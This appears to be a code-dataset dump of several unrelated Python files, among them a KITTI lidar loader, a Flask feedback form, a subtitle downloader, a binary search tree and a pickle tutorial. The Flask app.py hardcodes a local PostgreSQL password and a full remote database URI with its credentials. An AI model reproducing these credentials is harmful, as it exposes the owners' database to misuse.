Root directory of the KITTI dataset.\n split (string, optional): The dataset subset which can be either\n \"train\", \"val\", or \"test\". Default: ``\"train\"``.\n transforms (callable, optional): A function/transform that takes\n input sample and its target as entry and return a transformed\n version. Default: ``None``.\n rectified (bool, optional): If True, return the LiDAR point cloud\n in the camera rectified coordinate system. Default: ``True``.\n remove_dontcare (bool, optional): If True, remove DontCare label\n from the ground truth annotations. Default: ``True``.\n \"\"\"\n\n def __init__(\n self,\n root,\n split=\"train\",\n transforms=None,\n rectified=True,\n remove_dontcare=True,\n ):\n super(KITTIDetection, self).__init__()\n self.root = root\n self.split = split\n if split in [\"train\", \"val\"]:\n self.splitdir = \"training\"\n else:\n self.splitdir = \"testing\"\n self.transforms = transforms\n self.rectified = rectified\n self.remove_dontcare = remove_dontcare\n self.image_path = os.path.join(root, self.splitdir, \"image_2\")\n self.lidar_path = os.path.join(root, self.splitdir, \"velodyne\")\n self.label_path = os.path.join(root, self.splitdir, \"label_2\")\n self.calib_path = os.path.join(root, self.splitdir, \"calib\")\n\n if not self._check_integrity():\n raise RuntimeError(\"Dataset not found or corrupted.\")\n\n self.framelist = sorted(\n [\n int(x.split(\".\")[0])\n for x in os.listdir(self.lidar_path)\n if re.match(\"^[0-9]{6}.bin$\", x)\n ]\n )\n\n def _check_integrity(self):\n return (\n os.path.exists(self.image_path)\n and os.path.exists(self.calib_path)\n and os.path.exists(self.lidar_path)\n and (os.path.exists(self.label_path) if self.split == \"training\" else True)\n )\n\n def __len__(self):\n return len(self.framelist)\n\n def __getitem__(self, i):\n frameid = self.framelist[i]\n image = self._get_image(frameid)\n lidar = self._get_lidar(frameid)\n if self.rectified:\n calib = self._get_calib(frameid)\n lidar = self.rectify_lidar(lidar, calib)\n\n inputs = {\"image\": image, \"points\": lidar}\n target = None\n if self.split != \"test\":\n target = self._get_label(frameid)\n if self.transforms is not None:\n inputs, target = self.transforms(inputs, target)\n return inputs, target\n\n def _get_image(self, frameid):\n basename = \"{:06d}.png\".format(frameid)\n filename = os.path.join(self.image_path, basename)\n image = Image.open(filename)\n image = np.asarray(image, dtype=np.float32)\n return image\n\n def _get_lidar(self, frameid):\n basename = \"{:06d}.bin\".format(frameid)\n filename = os.path.join(self.lidar_path, basename)\n lidar = np.fromfile(filename, dtype=np.float32).reshape(-1, 4)\n return lidar\n\n def _get_calib(self, frameid):\n basename = \"{:06d}.txt\".format(frameid)\n filename = os.path.join(self.calib_path, basename)\n calib = self.read_calib(filename)\n return calib\n\n def _get_label(self, frameid):\n basename = \"{:06d}.txt\".format(frameid)\n filename = os.path.join(self.label_path, basename)\n annotations = self.read_label_annotations(filename, self.remove_dontcare)\n annotations = self.add_difficulty_to_annotations(annotations)\n return annotations\n\n @staticmethod\n def rectify_lidar(lidar, calib):\n n = lidar.shape[0]\n velo_to_rect = np.dot(calib[\"velo_to_cam\"].T, calib[\"R0\"].T)\n xyzw = np.c_[lidar[:, 0:3], np.ones(n)]\n xyz = np.dot(xyzw, velo_to_rect)\n intensity = lidar[:, 3]\n return np.c_[xyz, intensity]\n\n @staticmethod\n def add_difficulty_to_annotations(annotations):\n min_height = [40, 25, 25]\n max_occlusion = [0, 1, 2]\n max_truncation = [0.15, 0.3, 0.5]\n bbox = annotations[\"bbox\"]\n height = bbox[:, 3] - bbox[:, 1]\n occlusion = annotations[\"occluded\"]\n truncation = annotations[\"truncated\"]\n\n num_annotations = len(annotations[\"class\"])\n is_easy = np.ones((num_annotations,), dtype=np.bool)\n is_moderate = np.ones((num_annotations,), dtype=np.bool)\n is_hard = np.ones((num_annotations,), dtype=np.bool)\n for i, (h, o, t) in enumerate(zip(height, occlusion, truncation)):\n if o > max_occlusion[0] or h <= min_height[0] or t > max_truncation[0]:\n is_easy[i] = False\n if o > max_occlusion[1] or h <= min_height[1] or t > max_truncation[1]:\n is_moderate[i] = False\n if o > max_occlusion[2] or h <= min_height[2] or t > max_truncation[2]:\n is_hard[i] = False\n is_hard = np.logical_xor(is_hard, is_moderate)\n is_moderate = np.logical_xor(is_moderate, is_easy)\n\n difficulty = []\n for i in range(num_annotations):\n if is_easy[i]:\n difficulty.append(0)\n elif is_moderate[i]:\n difficulty.append(1)\n elif is_hard[i]:\n difficulty.append(2)\n else:\n difficulty.append(-1)\n annotations[\"difficulty\"] = np.array(difficulty, dtype=np.int32)\n return annotations\n\n @staticmethod\n def read_label_annotations(filename, remove_dontcare=True):\n annotations = {\n \"class\": [],\n \"truncated\": [],\n \"occluded\": [],\n \"alpha\": [],\n \"bbox\": [],\n \"size\": [],\n \"center\": [],\n \"yaw\": [],\n }\n with open(filename, \"r\") as fp:\n lines = [line.strip().split(\" \") for line in fp.readlines()]\n if remove_dontcare:\n lines = [line for line in lines if line[0] != \"DontCare\"]\n annotations[\"class\"] = np.array([x[0] for x in lines])\n annotations[\"truncated\"] = np.array([float(x[1]) for x in lines])\n annotations[\"occluded\"] = np.array([int(x[2]) for x in lines])\n annotations[\"alpha\"] = np.array([float(x[3]) for x in lines])\n annotations[\"bbox\"] = np.array([[float(v) for v in x[4:8]] for x in lines])\n annotations[\"size\"] = np.array([[float(v) for v in x[8:11]] for x in lines])\n annotations[\"center\"] = np.array([[float(v) for v in x[11:14]] for x in lines])\n annotations[\"yaw\"] = np.array([float(x[14]) for x in lines])\n annotations[\"bbox\"] = annotations[\"bbox\"].reshape(-1, 4)\n annotations[\"size\"] = annotations[\"size\"].reshape(-1, 3)\n annotations[\"center\"] = annotations[\"center\"].reshape(-1, 3)\n annotations[\"yaw\"] = annotations[\"yaw\"].reshape(-1)\n return annotations\n\n @staticmethod\n def read_calib(filename):\n calib = {}\n with open(filename, \"r\") as fp:\n lines = [line.strip().split(\" \") for line in fp.readlines()]\n calib[\"P0\"] = np.array([float(x) for x in lines[0][1:13]])\n calib[\"P1\"] = np.array([float(x) for x in lines[1][1:13]])\n calib[\"P2\"] = np.array([float(x) for x in lines[2][1:13]])\n calib[\"P3\"] = np.array([float(x) for x in lines[3][1:13]])\n calib[\"R0\"] = np.array([float(x) for x in lines[4][1:10]])\n calib[\"velo_to_cam\"] = np.array([float(x) for x in lines[5][1:13]])\n calib[\"imu_to_velo\"] = np.array([float(x) for x in lines[6][1:13]])\n calib[\"P0\"] = calib[\"P0\"].reshape(3, 4)\n calib[\"P1\"] = calib[\"P1\"].reshape(3, 4)\n calib[\"P2\"] = calib[\"P2\"].reshape(3, 4)\n calib[\"P3\"] = calib[\"P3\"].reshape(3, 4)\n calib[\"R0\"] = calib[\"R0\"].reshape(3, 3)\n calib[\"velo_to_cam\"] = calib[\"velo_to_cam\"].reshape(3, 4)\n calib[\"imu_to_velo\"] = calib[\"imu_to_velo\"].reshape(3, 4)\n return calib\n\n @staticmethod\n def collate_fn(batch):\n return [list(x) for x in zip(*batch)]\n","sub_path":"torch3d/datasets/kitti.py","file_name":"kitti.py","file_ext":"py","file_size_in_byte":8305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"351106390","text":"from helper_functions import *\nfrom settings import *\nimport pickle\nimport matplotlib.pyplot as plt\n\ndef main():\n loss_path = getLossPath(MODEL_NAME)\n loss = pickle.load(open(loss_path, \"rb\"))\n\n plt.figure()\n plt.subplot(2, 2, 1)\n plt.plot(loss['training']['loss'])\n plt.title('Training loss')\n\n plt.subplot(2, 2, 2)\n plt.plot(loss['training']['accuracy'])\n plt.title('Training accuracy')\n\n plt.subplot(2, 2, 3)\n plt.plot(loss['validation']['loss'])\n plt.title('Validation loss')\n\n plt.subplot(2, 2, 4)\n plt.plot(loss['validation']['accuracy'])\n plt.title('Validation accuracy')\n plt.show()\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"inspect_loss.py","file_name":"inspect_loss.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"483900864","text":"from flask import Flask, render_template, request\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nfrom send_mail import send_mail\r\n\r\napp = Flask(__name__)\r\n\r\nENV = 'prod'\r\n\r\nif ENV == 'dev':\r\n app.debug = True\r\n app.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://postgres:Srqq98aa@localhost/debinco'\r\nelse:\r\n app.debug = False\r\n app.config[\r\n 'SQLALCHEMY_DATABASE_URI'] = 'postgresql://ohtejgtdgvlmwd:15013d2fb0ec2513023518d5b87e495eebe6bb8ced597980e789892849129e3f@ec2-3-223-72-172.compute-1.amazonaws.com:5432/davopa4qfajuas'\r\n\r\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\r\n\r\ndb = SQLAlchemy(app)\r\n\r\n#\r\n# class Feedback(db.Model):\r\n# __tablename__ = 'feedback'\r\n# id = db.Column(db.Integer, primary_key=True)\r\n# Name = db.Column(db.String(200), unique=True)\r\n# Phone_Number = db.Column(db.String(20))\r\n# Email = db.Column(db.String(200))\r\n# rating = db.Column(db.Integer)\r\n# comments = db.Column(db.Text())\r\n#\r\n# def __init__(self, Name, Phone_Number , Email, rating, comments):\r\n# self.Name = Name\r\n# self.Phone_Number = Phone_Number\r\n# self.Email = Email\r\n# self.rating = rating\r\n# self.comments = comments\r\n#\r\n\r\n@app.route('/')\r\ndef index():\r\n return render_template('index.html')\r\n\r\n\r\n@app.route('/submit', methods=['POST'])\r\ndef submit():\r\n if request.method == 'POST':\r\n Name = request.form['Name']\r\n Phone_Number = request.form['Phone_Number']\r\n Email = request.form['Email']\r\n rating = request.form['rating']\r\n comments = request.form['comments']\r\n # print(customer,dealer,rating,comments)\r\n # print(customer,dealer,rating,comments)\r\n if Name == '' or Phone_Number == '':\r\n return render_template('index.html', message=\"Please enter required feilds\")\r\n else:\r\n send_mail(Name, Phone_Number, Email, rating, comments)\r\n return render_template('success.html')\r\n\r\n return render_template('index.html', message=\"You have already Submitted\")\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run()\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"227666027","text":"# -*- coding: utf-8 -*-\r\nfrom Database.oracle import Oracle\r\nfrom config_file import config_na1 as na1\r\nimport config_file as cf\r\nfrom Graphics.diagram_layout_maker import Diagramm_Layout_Maker as diagram_layout\r\nimport datetime\r\nimport numpy as np\r\nimport cPickle\r\nfrom Analysis.fitting import fit_1D_data, filter_relevant, funcs\r\n\r\n\r\nfrom Tools.helper import init_logging\r\nimport logging\r\n\r\n\r\n\r\nORACLE = Oracle(db_user=na1[\"user\"], db_pwd=na1[\"password\"], db_srv=na1[\"SID\"], db_ip=na1[\"ip\"], db_port=na1[\"port\"])\r\n\r\n\r\nif __name__ == '__main__':\r\n dialay = diagram_layout()\r\n dialay.set_defaults(defaultset=\"powerpoint\")\r\n\r\n\r\n sql = \"\"\"select cm, von, bis, asb from oa_cm_cmts_asb_hist_cons order by asb\r\n \"\"\"\r\n\r\n# data = ORACLE.executeSQL(sql)\r\n\r\n sql = \"\"\" select distinct asb from oa_cm_cmts_asb_hist order by asb\"\"\"\r\n# asbs = ORACLE.executeSQL(sql)\r\n\r\n #f = open('netzalter_raw.dat', 'wb')\r\n #cPickle.dump((data, asbs), f)\r\n\r\n #===========================================================================\r\n # f = open('netzalter_raw.dat', 'rb')\r\n # data, asbs = cPickle.load(f)\r\n # print(len(data))\r\n # print(len(asbs))\r\n #===========================================================================\r\n\r\n# asbdata = []\r\n# ind = 0\r\n# maxi = -1\r\n# for asb in asbs:\r\n# sd = datetime.datetime(2009, 2, 4, 0, 0)\r\n# ox = []\r\n# oy = []\r\n# ind = maxi + 1\r\n# while sd < datetime.datetime(2014, 4, 26, 0, 0):\r\n# dummy = 0\r\n# i = ind\r\n# while i < len(data) and data[i][3] == asb:\r\n# if i > maxi:\r\n# maxi = i\r\n# if data[i][3] == asb and data[i][1] <= sd and (data[i][2] == None or data[i][2] > sd):\r\n# dummy += 1\r\n# i += 1\r\n# ox += [sd]\r\n# oy += [dummy]\r\n# sd += datetime.timedelta(7)\r\n# asbdata += [[asb, ox, oy]]\r\n #print(asbdata[len(asbdata) - 1])\r\n\r\n# f = open('C:\\Plots\\\\netzalter.dat', 'wb')\r\n# cPickle.dump(asbdata, f)\r\n\r\n f = open('C:\\Plots\\\\netzalter.dat', 'rb')\r\n asbdata = cPickle.load(f)\r\n\r\n oy = []\r\n ox = []\r\n seglist = []\r\n for asb in asbdata:\r\n segdates = []\r\n for i in range(1,len(asb[2])-2):\r\n if asb[2][i] > 0 and asb[2][i+1] / float(asb[2][i]) < 0.7 and (asb[2][i] - asb[2][i+1] > 20) and asb[1][i-1] not in segdates and asb[2][i+1] > asb[2][i]/10.0 and asb[2][i+2] / float(asb[2][i]) < 0.7:\r\n #segdates += [asb[1][i]]\r\n seglist += [[asb[0], asb[1][i]]]\r\n #if segdates:\r\n # seglist += [[asb[0], segdates]]\r\n\r\n columns = [\"ASB\", \"Seg_date\"]\r\n col_types = [u\"abcdefg\",datetime.date(2013,12,12)]\r\n tablename = \"asb_segdate\"\r\n\r\n #ORACLE.drop_table(tablename)\r\n #ORACLE.create_table(tablename, columns, col_types)\r\n #ORACLE.insert_data(table=tablename, columns=columns, data=seglist, stepWidth=10000)\r\n\r\n for j in range(len(asbdata[0][1])):\r\n ox += [asbdata[0][1][j]]\r\n dummy = 0\r\n for i in range(len(asbdata)):\r\n if 'ASB Falkensee Hk A RW 3 UPK 02' in asbdata[i][0]:\r\n dummy += asbdata[i][2][j]\r\n oy += [dummy]\r\n\r\n dialay.add_lineplot(x=ox, y=oy, title='Modems laut oa_cm_cmts_asb_hist', y_label='Modems')\r\n\r\n#===============================================================================\r\n# meanormy = [0 for i in range(len(ox))]\r\n# asbcount = [0 for i in range(len(ox))]\r\n# for i in range(len(asbdata)):\r\n# maxi = max(asbdata[i][2])\r\n# temparr = []\r\n# k = 0\r\n# for j in range(len(asbdata[i][2])):\r\n# \r\n# if asbdata[i][2][j] > 0:\r\n# temparr += [asbdata[i][2][j] / float(maxi)]\r\n# meanormy[k] += asbdata[i][2][j] / float(maxi)\r\n# asbcount[k] += 1\r\n# k += 1\r\n# \r\n# asbdata[i][2] = temparr\r\n# \r\n# for i in range(len(asbcount)):\r\n# if asbcount[i] == 0:\r\n# asbcount[i] = 1\r\n# \r\n# meanormy = [meanormy[i] / float(asbcount[i]) for i in range(len(asbcount))]\r\n# \r\n# dialay.add_lineplot(x=[i for i in range(len(asbdata[0][1]))], y=asbdata[111][2])\r\n#===============================================================================\r\n\r\n dialay.show()\r\n","sub_path":"naos-python/Source/SH/Bandbreite/netz_aging.py","file_name":"netz_aging.py","file_ext":"py","file_size_in_byte":4327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"215116825","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Feb 3 10:06:33 2018\n\n@author: jasneet\n\"\"\"\n\n# Importing the libraries\nimport pandas as pd\nimport tweepy\nimport operator\n\n\n# Get data from csv file\ndataset = pd.read_csv('vnps.csv')\ntwitter_users = dataset.iloc[:,1].values\n\n#Load the tweepy api and do aunthentication\nconsumer_key = ''\nconsumer_secret = ''\naccess_token = ''\naccess_secret = ''\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_secret)\napi = tweepy.API(auth)\n\nuser_follower_dictionary = {}\nfor user in twitter_users[:]:\n print(user)\n try:\n tweepy_user_object = api.get_user(id=user)\n user_follower_dictionary[user] = tweepy_user_object.followers_count\n except tweepy.TweepError:\n user_follower_dictionary[user] = 0\n\nsorted_list = sorted(user_follower_dictionary.items(), key=operator.itemgetter(1))","sub_path":"Competition/Uottawa/uottawa_twitter_challenge.py","file_name":"uottawa_twitter_challenge.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"183897147","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 7 18:02:22 2019\n\n@author: Rawat\n\"\"\"\n\nclass node:\n def __init__(self,data):\n self.data=data\n self.left=None\n self.right=None\n self.p=None\nclass tree:\n root=None\n def insert(self,data):\n z=node(data)\n y=None\n x=self.root\n while x!=None:\n y=x\n if x.data>z.data:\n x=x.left\n else:\n x=x.right\n z.p=y\n if y==None:\n self.root=z\n elif y.data>z.data:\n y.left=z\n else:\n y.right=z\n def inorder(self):\n self.inorderec(self.root)\n def inorderec(self,start):\n if start!=None:\n self.inorderec(start.left)\n print(start.data)\n self.inorderec(start.right)\n def Succesor(self,x):\n if x.right!=None:\n u=x.right\n while u.left!=None:\n u=u.left\n return u.data\n else:\n u=x.p\n while u!=None and u.right==x:\n x=u\n u=u.p\n if u!=None:\n return u.data\n else:\n return None\n def TreeMaximum(self,x):\n while x.right!=None:\n x=x.right\n return x\n def TreeMinimum(self,x):\n while x.left!=None:\n x=x.left\n def TreeSearch(self,key):\n x=self.root\n while x!=None:\n if x.data==key:\n return x\n elif x.data>key:\n x=x.left\n else:\n x=x.right\n def Transplant(self,x,y):\n if x==None:\n self.root=y\n elif x==x.p.right:\n x.p.right=y\n else:\n x.p.left=y\n if y!=None:\n y.p=x.p\n def delete(self,z):\n if z.left==None:\n self.Transplant(z,z.right)\n elif z.right==None:\n self.Transplant(z,z.left)\n else:\n y=self.TreeMinimum(z.right)\n if y.p!=z:\n self.Transplant(y,y.right)\n y.right=z.right\n z.right.p=y\n self.Transplant(z,y)\n z.left.p=y\n y.left=z.left\n \n \n \nif __name__==\"__main__\":\n t=tree()\n print(\"enter the tree data\")\n x=map(int,input().rstrip().split())\n for i in x:\n t.insert(i)\n print(\"display tree inorder\")\n t.inorder()\n print(\"enter the element to be deleted\")\n x=map(int,input().rstrip().split())\n for i in x:\n u=t.TreeSearch(i)\n t.delete(u)\n print(\"after the deletion operation of %d \"%u.data)\n t.inorder()\n","sub_path":"bst.py","file_name":"bst.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"355682058","text":"import glob\nimport os\nimport gzip\nimport binascii\nimport io\nimport re\nimport collections\n\nimport open_subtitles\n\nfrom xmlrpc.client import ServerProxy\n\n\ndef filter_subtitles(subtitles, search):\n season = int(search.group('season'))\n episode = int(search.group('episode'))\n subtitles = [d for d in subtitles if (d['SeriesEpisode'] == str(episode) and d['SeriesSeason'] == str(season))]\n return subtitles\n\n\ndef get_video_files():\n current_dir = os.getcwd()\n # TODO: Handle all supported file types\n videos = glob.glob(os.path.join(current_dir, '*.mkv'))\n return videos\n\n\ndef get_login_token(server):\n login_info = server.LogIn('', '', 'en', 'OSTestUserAgentTemp')\n token = login_info['token']\n return token\n\n\ndef get_file_info(video_file):\n filename = (os.path.basename(video_file))\n filename = os.path.splitext(filename)[0]\n file_size = os.path.getsize(video_file)\n file_hash = open_subtitles.hash_file(video_file)\n\n File = collections.namedtuple('File', 'name, size, hash')\n file_info = File(filename, file_size, file_hash)\n return file_info\n\n\ndef download_subtitles(subtitles_found, server, token, file_info):\n sub = max(subtitles_found, key=lambda x: x.get('score', 0))\n\n sub_id = sub['IDSubtitleFile']\n\n sub_file = server.DownloadSubtitles(token, [sub_id])\n\n coded_string = sub_file['data'][0]['data']\n\n subtitles = gzip.decompress(binascii.a2b_base64(coded_string))\n\n sub_filename = file_info.name + '.srt'\n\n with io.FileIO(sub_filename, \"w\") as file:\n file.write(subtitles)\n\n\ndef main():\n print('Searching video files.')\n videos = get_video_files()\n if not videos:\n print(' - No video files found. \\n Done.')\n return\n\n server_name = 'http://api.opensubtitles.org/xml-rpc'\n server = ServerProxy(server_name)\n token = get_login_token(server)\n\n print(' - {} video files found.'.format(len(videos)))\n\n for video_file in videos:\n file_info = get_file_info(video_file)\n\n print('Searching subtitles for {}.'.format(file_info.name))\n\n params = {'moviehash': file_info.hash, 'moviebytesize': file_info.size, 'sublanguageid': 'eng'}\n\n subs = server.SearchSubtitles(token, [params])\n if subs['status'] != '200 OK':\n print('Error {0}'.format(subs['status']))\n continue\n\n subtitles_found = subs['data']\n\n regex = re.compile(r\"\"\"[Ss](?P\\d+) # season number (i.e. S01 or s2)\n [Ee](?P\\d+) # episode number (i.e. E1 or e02)\n \"\"\", re.X)\n search = re.search(regex, file_info.name)\n if search:\n subtitles_found = filter_subtitles(subtitles_found, search)\n\n if not subtitles_found:\n print(' - No matching subtitles found.')\n continue\n\n print(' - Subtitles found. \\n - Downloading.')\n\n download_subtitles(subtitles_found, server, token, file_info)\n server.LogOut(token)\n\n print('Done.')\n\n# TODO exceptions, logs\n\n# TODO tests: file_info, subs search, filtering/validation, saving file\n\nif __name__ == '__main__':\n main()\n","sub_path":"subs.py","file_name":"subs.py","file_ext":"py","file_size_in_byte":3150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"217593766","text":"import os\n\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nfrom selenium.webdriver.chrome.options import Options\n\nchrome_options = Options()\nchrome_options.add_argument(\"--window-size=300,400\")\n\ndriver = webdriver.Chrome(chrome_options=chrome_options)\ndriver.get(\"https://myportal.fhda.edu/cp/home/displaylogin\")\n\n\ndef scrape_cookies():\n driver.execute_script(f\"document.getElementById('user').value='{os.environ['MP_USER']}'\")\n driver.execute_script(f\"document.getElementById('pass').value='{os.environ['MP_PASS']}'\")\n\n try:\n driver.execute_script(\"doLogin()\")\n WebDriverWait(driver, 3).until(\n EC.title_is(\"MyPortal / Foothill-De Anza College District\")\n )\n\n driver.get(\n \"https://myportal.fhda.edu/render.UserLayoutRootNode.uP?uP_tparam=utf&utf=%2fcp%2fip%2flogin%3fsys%3dsctssb%26url%3dhttps%3A%2F%2Fbanssb.fhda.edu%2FPROD%2Fbwskfcls.p_sel_crse_search\")\n\n WebDriverWait(driver, 3).until(\n EC.title_is(\"MyPortal / Foothill-De Anza College District\")\n )\n finally:\n cookies_list = driver.get_cookies()\n\n return get_cookies(cookies_list)\n\n\ndef get_cookies(cookies_list):\n cookies_dict = {}\n for cookie in cookies_list:\n cookies_dict[cookie['name']] = cookie['value']\n return cookies_dict\n\n\ndef kill_driver():\n driver.quit()\n\n\nif __name__ == '__main__':\n scrape_cookies()\n","sub_path":"selenium_login.py","file_name":"selenium_login.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"392474006","text":"#Checks last G0/G1 command that effects extruder. outputs expected filament use in cm\r\n\r\nimport sys\r\n\r\nl_total = 0.0\r\n\r\ndef filenameFromPath(path):\r\n\tif (path[0] == '\\\"' or path[0] == '\\''):\r\n\t\tpath = path[1:-1]\r\n\tf_name = path[::-1]\r\n\tidx = f_name.index(\"\\\\\")\r\n\tf_name = f_name[:idx]\r\n\tf_name = f_name[::-1]\r\n\tprint(f_name)\r\n\r\ndef findLength(path):\r\n\twith open(path) as file:\r\n\t\tval = 0.0\r\n\t\tlength = 0.0\r\n\t\tm107Occ = False\r\n\t\tfor line in file:\r\n\t\t\tline = line.strip()\r\n\t\t\tif \"G0\" in line or \"G1\" in line:\r\n\t\t\t\tif \"E\" in line:\r\n\t\t\t\t\tidx = line.index('E')\r\n\t\t\t\t\tsubstr = line[idx+1:]\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\ttmp = float(substr)\r\n\t\t\t\t\texcept:\r\n\t\t\t\t\t\tcontinue\r\n\t\t\t\t\t\r\n\t\t\t\t\tif tmp > val:\r\n\t\t\t\t\t\tval = tmp\r\n\t\t\tif \"G92 E0\" in line:\r\n\t\t\t\tlength += val\r\n\t\t\tif \"M107\" in line:\r\n\t\t\t\tif m107Occ == True:\r\n\t\t\t\t\tlength +=val\r\n\t\t\t\t\tbreak\r\n\t\t\t\tm107Occ = True\r\n\t\t\t\t\r\n\t\t\r\n\t\tlength_raw = length\r\n\t\tlength = length/10\r\n\t\tlength = round(length, 3)\r\n\treturn(\"Filament length: {}cm\".format(length), length_raw)\r\n\r\nif __name__ == \"__main__\":\r\n\tif len(sys.argv) < 2:\r\n\t\tpath = input(\"File path: \")\r\n\t\tfilenameFromPath(path)\r\n\t\tout, length = findLength(path)\r\n\t\tprint(out)\r\n\telse:\r\n\t\tfor i in range(1, len(sys.argv)):\r\n\t\t\tpath = sys.argv[i]\r\n\t\t\tfilenameFromPath(path)\r\n\t\t\tout, length = findLength(path)\r\n\t\t\tl_total += length\r\n\t\t\tprint(out)\r\n\t\t\tprint()\t\r\n\t\ttotal = round((l_total/10),3)\r\n\t\tprint(\"Total: {}cm\".format(total))\r\n\tinput()\r\n","sub_path":"length.py","file_name":"length.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"492714527","text":"# Pickle data from data folder\r\nimport _pickle as cPickle\r\nimport gzip\r\n\r\ndef load_data_wrapper(PATH_TRAIN):\r\n f1=gzip.open(PATH_TRAIN,'rb')\r\n training_data, validation_data, test_data, data_mean, data_std, label_mean, label_std=cPickle.load(f1, encoding='latin1')\r\n f1.close()\r\n return (training_data, validation_data, test_data, data_mean, data_std, label_mean, label_std)\r\n\r\ndef load_new_data(PATH_NEW):\r\n f2=gzip.open(PATH_NEW,'rb')\r\n datas, labels, x_new=cPickle.load(f2, encoding='latin1')\r\n f2.close()\r\n return (datas, labels, x_new)","sub_path":"ada-lr-df/ex6/ex6_loader.py","file_name":"ex6_loader.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"393449154","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('trabajadores', '0001_initial'),\n ('mascotas', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Hospedaje',\n fields=[\n ('fecha_ini', models.DateField(null=True, blank=True)),\n ('fecha_fin', models.DateField(null=True, blank=True)),\n ('id_hosp', models.AutoField(serialize=False, primary_key=True)),\n ('nro_jaula', models.IntegerField()),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Servicio',\n fields=[\n ('id_serv', models.IntegerField(serialize=False, primary_key=True)),\n ('fecha', models.DateTimeField(null=True, blank=True)),\n ('id_masc', models.ForeignKey(to='mascotas.Mascota')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='TipoServ',\n fields=[\n ('id_t_serv', models.AutoField(serialize=False, primary_key=True)),\n ('nomb_servicio', models.CharField(max_length=25)),\n ('precio_serv', models.DecimalField(max_digits=5, decimal_places=2)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='servicio',\n name='id_t_serv',\n field=models.ForeignKey(to='servicios.TipoServ'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='servicio',\n name='id_trab',\n field=models.ForeignKey(blank=True, to='trabajadores.Trabajador', null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='hospedaje',\n name='id_serv',\n field=models.ForeignKey(to='servicios.Servicio'),\n preserve_default=True,\n ),\n ]\n","sub_path":"servicios/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"298136810","text":"import logging\n\nlogger = logging.getLogger(\"ImageClassifier\")\nlogger.setLevel(logging.DEBUG)\nformatter = logging.Formatter(\n \"%(asctime)s - %(name)s - %(levelname)s - %(module)s - %(funcName)s - %(lineno)d - %(message)s\"\n)\nstream_handler = logging.StreamHandler()\nstream_handler.setFormatter(formatter)\nlogger.addHandler(stream_handler)\nlogger.propagate = 0\n","sub_path":"src/utils/model_logger.py","file_name":"model_logger.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"87997783","text":"# The process of converting an object from python supported form to either file supported\n# form or network supported form, is called serialization (Marshalling or pickling)..\n\n# The process of converting an object from either file supported form or network supported\n# form to python supported form is called deserialization (Unmarshalling or unpickling)...\n\n# Object Serialization by using Pickle\n# Object Serialization by using JSON\n# Object Serialization by using YAML\n\n\n# Object Serialization by using Pickle:\n# We can perform serialization and deserialization of an object wrt file by using pickle\n# module. It is Python's inbuilt module.\n\n# pickle module contains dump() function to perform Serialization(pickling).\n# pickle.dump(object,file)\n\n# pickle module contains load() function to perform Deserialization (unpickling).\n# object = pickle.load(file)\n\nimport pickle\n\nclass Employee:\n\n def __init__(self,eno,ename,esal,eaddr):\n self.eno=eno\n self.ename=ename\n self.esal=esal\n self.eaddr=eaddr \n\n def display(self):\n print(f'Employee Number:{self.eno} , Employee Name:{self.ename} ,Employee Salary:{self.esal} , Employee Address:{self.eaddr}')\n\n\ne = Employee(100,'Saroj',123,'Mumbai')\n\n# Serialization\nwith open('emp.dat','wb') as f:\n pickle.dump(e,f)\n\nprint('Pickling of the object completed...')\n\n# Deserialization\n\nwith open('emp.dat','rb') as f:\n emp_object = pickle.load(f)\n\n\nprint('Unpickling of the object 